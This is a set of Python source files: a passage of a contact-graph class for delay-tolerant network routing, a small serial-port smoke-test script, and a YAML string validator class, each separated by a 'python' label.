""" node_list = list(graph.keys()) # Now that we have all nodes, start generating the edges which is quite # expensive but we only have to do it once for all nodes and all times # (as long as the contact plan is not changing) for node1 in graph: # Remove the currently investigated node node_list.remove(node1) for node2 in node_list: # Check if the end node of the first contact is the start node # of the second contact and the next contact is not returning # to the initial node if (node1.to_node == node2.from_node and node1.from_node != node2.to_node): # If that is the case, evaluate if the timing adds up if node2.to_time > node1.from_time: # Add edge from node1 to node2 (directed, by adding # link to node2 to successor list of node1), also add # node1 to list of predecessors of node2 graph[node1].successors.append(node2) graph[node2].predecessors.append(node1) # Also check if the end node of the second contact is the # start node of the first contact and the next contact is not # returning to the initial node elif (node2.to_node == node1.from_node and node2.from_node != node1.to_node): # If that is the case, evaluate if the timing adds up if node1.to_time > node2.from_time: # Add edge from node1 to node2 (directed, by adding # link to node2 to successor list of node1), also add # node1 to list of predecessors of node2 graph[node2].successors.append(node1) graph[node1].predecessors.append(node2) # Sort the predecessor/successor lists by the hash value of the # nodes. for node in graph: graph[node].successors.sort( key=(lambda c: (c.to_time, hash(c.to_node))), reverse=True) graph[node].predecessors.sort( key=(lambda c: (c.to_time, hash(c.from_node))), reverse=True) @staticmethod def _generate_contact_graph(contact_plan): """Generate a contact graph based on a given contact plan. Args: contact_plan (ContactPlan): The contact plan representation used for the contact graph generation. 
Returns: OrderedDict: The contact graph as ordered dictionary Raises: ValueError: If the function is called with an object other than ContactPlan. """ if not isinstance(contact_plan, ContactPlan): raise ValueError("The loaded contact plan is not a ContactPlan " "object") # TODO: Normal dictionaries are ordered in Python +3.7 graph = OrderedDict() for contact in contact_plan.plan['contacts']: # Add item to graph: # - Key: from_node, to_node, start_time, end_time, datarate, delay # - Value: NeighborLists(namedtuple) graph[contact] = NeighborLists( successors=list(), predecessors=list()) # Create identifier for terminal node terminal_node = ContactIdentifier( from_node=contact.to_node, to_node=contact.to_node, from_time=0, to_time=math.inf, datarate=math.inf, delay=0) # Create identifier for root node root_node = ContactIdentifier( from_node=contact.from_node, to_node=contact.from_node, from_time=0, to_time=math.inf, datarate=math.inf, delay=0) # Create terminal node (if not existing yet) if terminal_node not in graph: graph[terminal_node] = NeighborLists( successors=list(), predecessors=list()) # Create root node (if not existing yet) if root_node not in graph: graph[root_node] = NeighborLists( successors=list(), predecessors=list()) for node in contact_plan.plan['nodes']: # Create identifier for terminal node nominal_node = ContactIdentifier( from_node=node, to_node=node, from_time=0, to_time=math.inf, datarate=math.inf, delay=0) # Create root node (if not existing yet) if nominal_node not in graph: graph[nominal_node] = NeighborLists( successors=list(), predecessors=list()) # Return the generated graph object return graph def __init__(self, contact_plan=None): if contact_plan is not None: self.graph = ContactGraph._generate_contact_graph(contact_plan) self._create_graph_edges(self.graph) self.hashes = self._generate_hashes() # Copy the coldspot/hotspot information from the ContactPlan self.hotspots = contact_plan.hotspots self.coldspots = contact_plan.coldspots 
self.capacity_storage = None else: self.graph = OrderedDict() self.hashes = OrderedDict() def remove_contact_node(self, contact): """Remove single contact from graph. Args: contact (ContactIdentifier): Contact identifier referencing the contact to be removed. Raises: ValueError: If the contact identifier is not a ContactIdentifier named tuple or if the contact identifier is not in the current graph. """ # Check if contact is the right type if not isinstance(contact, ContactIdentifier): raise ValueError("ContactIdentifier named tuple should be used \ for accessing ContactGraph object") if contact not in self.graph: raise ValueError("Contact specified by identifier not part of \ graph") # Remove the reference to the contact (i.e. the edge) from all # predecessors of this contact for pred in self.graph[contact].predecessors: self.graph[pred].successors.remove(contact) # Remove the reference to the contact (i.e. the edge) from all # successors of this contact for succ in self.graph[contact].successors: self.graph[succ].predecessors.remove(contact) # Remove node from graph dict del self.graph[contact] del self.hashes[contact] def add_contact_node(self, contact): """Add contact node to graph object. Args: contact (ContactIdentifier): Contact that should be added to the contact graph. Raises: ValueError: When no ContactIdentifier named tuple is used for this operation. 
""" # Check if contact is the right type if not isinstance(contact, ContactIdentifier): raise ValueError("ContactIdentifier named tuple should be used \ for accessing ContactGraph object") # Add node to graph dictionary self.graph[contact] = NeighborLists( successors=list(), predecessors=list()) self.hashes[contact] = (hash(contact.to_node), hash(contact.from_node)) # Add contact successors and predecessors for cont in self.graph: if cont == contact: # Ignore self reference continue # Check if contact can be successor or predecessor if cont.to_time > contact.from_time and \ cont.from_node == contact.to_node: self.graph[contact].successors.append(cont) self.graph[cont].predecessors.append(contact) if contact.to_time > cont.from_time and \ contact.from_node == cont.to_node: self.graph[contact].predecessors.append(cont) self.graph[cont].successors.append(contact) def remove_topology_node(self, node_identifier): """Remove a topological node from the ContactGraph object. Can be used to e.g. purge an entire ground station from the graph. Args: node_identifier (string): Identifier of the topological node. """ # Iterate over all contacts of graph and check if topological node # is involved (either as source or destination node of a contact) for contact in list(self.graph.keys()): if node_identifier in (contact.from_node, contact.to_node): # Call function to remove applicable contact nodes from graph self.remove_contact_node(contact) def _generate_hashes(self): """Generate hashes for all nodes in graph. Returns: OrderedDict: A dictionary with the hashes of all nodes of the graph. """ hashes = OrderedDict() for contact in self.graph: hashes[contact] = (hash(contact.to_node), hash(contact.from_node)) return hashes def reinitialize(self, contact_plan=None): """Delete and regenerate the internal contact graph representation. Args: contact_plan (pydtnsim.ContactPlan): The ContactPlan object used for the new graph generation. Defaults to None. 
""" # Delete the current information del self.graph if contact_plan is not None: # Reinitialize the internal representation of the contact graph self.graph = self._generate_contact_graph(contact_plan) self.hashes = self._generate_hashes() else: self.graph = OrderedDict() self.hashes = OrderedDict() def get_networx_contact_graph(self, ignore_notional_nodes=False): """Provide contact graph as :mod:`networkx` :class:`DiGraph`. Args: ignore_notional_nodes (type): Return a networkx contact graph representation that does not include the notional nodes. Defaults to False. Returns: DiGraph: A networkx graph representation of the contact graph. """ # Create empty DiGraph object graph = nx.DiGraph() # Add all nodes in the topology to the graph for node in self.graph.keys(): if (ignore_notional_nodes and node.from_node == node.to_node): continue graph.add_node(str(node)) # Add edges between the contact nodes for node in self.graph.keys(): for successor in self.graph[node].successors: graph.add_edge(str(node), str(successor)) # Return graph return graph
python
#!/usr/bin/python
"""Smoke-test a serial device: send a few 'XA/' commands, print replies."""
import time

import serial

ser = serial.Serial('/dev/ttyUSB0')  # open serial port


def comm(msg):
    """Send one 'XA/<msg>' command over the global port, print the reply."""
    print("msg: %s" % msg)
    # FIX: pyserial 3.x under Python 3 requires bytes; writing a str raises
    # TypeError.
    ser.write(("XA/%s\r\n" % msg).encode("ascii"))
    resp = ser.readline()
    # FIX: `print resp` was Python 2 statement syntax — a SyntaxError under
    # Python 3, which the surrounding print() calls indicate is the target.
    print(resp)


print(ser.name)  # check which port was really used

msgs = ['kamu', 'N?', 'B?', 'T?']  # test the device
try:
    for msg in msgs:
        time.sleep(1)
        comm(msg)
finally:
    # FIX: close the port even when a command raises, not only on success.
    ser.close()
python
from .comparable import Comparable


class String(Comparable):
    """Comparable node type whose scalar value must be a string."""

    @classmethod
    def validate(cls, yaml_node):
        """Run the base-class validation, then require a string value.

        Aborts with an error at the node's location when the value is not
        a str.
        """
        super().validate(yaml_node)
        if isinstance(yaml_node.value, str):
            return
        cls.abort("Expected string input", yaml_node.loc)
python